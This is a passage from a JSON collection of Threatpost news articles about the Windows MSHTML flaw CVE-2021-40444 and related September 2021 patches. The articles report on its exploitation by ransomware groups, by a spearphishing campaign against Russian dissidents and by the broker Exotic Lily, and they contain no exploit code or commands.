rendering engine,\u201d after which \u201cthe attacker would then have to convince the user to open the malicious document.\u201d Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a [novel malware-obfuscation technique](<https://threatpost.com/microsoft-office-malware-protection-bypass/167652/>) to disable malicious macro warnings and deliver the ZLoader trojan.\n\nAn attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.\n\nSatnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.\n\n\u201cThere are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,\u201d Narang told Threatpost.\n\nLast Wednesday, Sept. 8, [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1435515875025633282>) \u2013 head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft \u2013 [noted](<https://twitter.com/GossiTheDog/status/1435562870331293706>) that the exploit had been in the wild for about a week or more.\n\nIt got worse: Last Thursday, Sept. 9, threat actors began [sharing exploit how-tos](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are \u201csimple to follow and [allow] anyone to create their own working version\u201d of the exploit, \u201cincluding a Python server to distribute the malicious documents and CAB files.\u201d\n\nIt took the publication all of 15 minutes to recreate the exploit.\n\nA week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had [urged mitigations](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.\n\nLast week, the company didn\u2019t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.\n\nMicrosoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.\n\nIn spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.\n\n## Mitigations That Don\u2019t Mitigate\n\nTracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended \u2013 mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.\n\nEmphasis on \u201ctry to:\u201d Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to [modify the exploit](<https://twitter.com/GossiTheDog/status/1435570418623070210>) so that it didn\u2019t use ActiveX, [effectively skirting Microsoft\u2019s mitigations](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/>).\n\nThe Zero Day Initiative [said that](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) for now, the most-effective defense is \u201cto apply the patch and avoid Office docs you aren\u2019t expecting to receive.\u201d\n\nBe sure to carefully review and install [all the needed patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for your setup: There\u2019s a long list of updates for specific platforms, and it\u2019s important not to slather on too thin a layer of protection.\n\nCredit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.\n\n## Baddest Bug Award\n\nThe award for baddest bug \u2013 or at least, the one with the highest severity rating, with a CVSS score of 9.8 \u2013 goes to [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>): a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.\n\n[OMI is an open-source project](<https://github.com/microsoft/omi>) to further the development of a production-quality implementation of the [DMTF CIM/WBEM](<https://www.dmtf.org/standards/cim>) standards.\n\n\u201cThis vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,\u201d the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.\n\n## Yet More PrintNightmare Patches\n\nMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671>) and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447>)), all rated important.\n\nThese are the three latest fixes in a steady [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler that followed the [disclosure of PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) in June. This probably won\u2019t be the last patch in that parade: Tenable\u2019s Narang told Threatpost that \u201cresearchers continue to discover ways to exploit Print Spooler\u201d and that the firm expects \u201ccontinued research in this area.\u201d\n\nOnly one \u2013 CVE-2021-38671 \u2013 of today\u2019s patch trio is rated as \u201cexploitation more likely.\u201d Regardless, organizations should prioritize patching these flaws as \u201cthey are extremely valuable to attackers in post-exploitation scenarios,\u201d Narang observed.\n\n## More \u2018Exploitation More Likely\u2019\n\nImmersive\u2019s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver ([CVE-2021-36955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955>), [CVE-2021-36963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963>), [CVE-2021-38633](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633>)) are also noteworthy, all of them being listed as \u201cexploitation more likely.\u201d\n\n\u201cLocal priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,\u201d Breen said via email. \u201cThis allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.\u201d\n\nOne glaring example of that emerged in May, when hundreds of millions of [Dell users were found to be at risk](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.\n\nThe three exploits Microsoft patched on Tuesday aren\u2019t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.\n\nTwo other vulnerabilities \u2013 [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>), both Win32k escalation of privilege flaws \u2013 have also been listed as \u201cexploitation more likely\u201d and, together, cover the full range of supported Windows versions.\n\nBreen said that he\u2019s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They\u2019re not rated as high a severity risk as RCE bugs, but \u201cthese local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,\u201d he asserted. \u201cIf you can block them here you have the potential to significantly limit their damage.\u201d\n\nhe added, \u201cIf we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,\u201d Breen said.\n\n## Still, This RCE Is Pretty Important\n\nDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965>) \u2013 an important-rated Windows WLAN AutoConfig Service RCE vulnerability \u2013 given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.\n\nThe WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.\n\nThe patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.\n\nAs the Zero Day Initiative explained, that means an attacker could \u201ccompletely take over the target \u2013 provided they are on an adjacent network.\u201d That would come in quite handy in a [coffee-shop attack](<https://threatpost.com/microsoft-wi-fi-protection/145053/>), where multiple people use an unsecured Wi-Fi network.\n\nThis one \u201cis especially alarming,\u201d Kim said: Think [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) and PrintNightmare.\n\n\u201cAs recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,\u201d he said in an email.\n\nKim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.\n\n\u201cIt specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker\u2019s end goal,\u201d he predicted. \u201cRemote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise\u2019s data.\u201d\n\nThe Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so \u201cdon\u2019t let the adjacent aspect of this bug diminish the severity,\u201d it said. \u201cDefinitely test and deploy this patch quickly.\u201d\n\n## And Don\u2019t Forget to Patch Chrome\n\nBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft\u2019s Chromium-based Edge.\n\nBrowsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.\n\n\u201cI cannot underestimate the importance of patching your browsers and keeping them up to date,\u201d he stressed. \u201cAfter all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you\u2019re thinking about your online banking or the data collected and stored by your organization\u2019s web apps, they could all be exposed by attacks that exploit the browser.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-14T20:29:14", "type": "threatpost", "title": "Microsoft Patches Actively Exploited Windows Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-14T20:29:14", "id": "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "href": "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 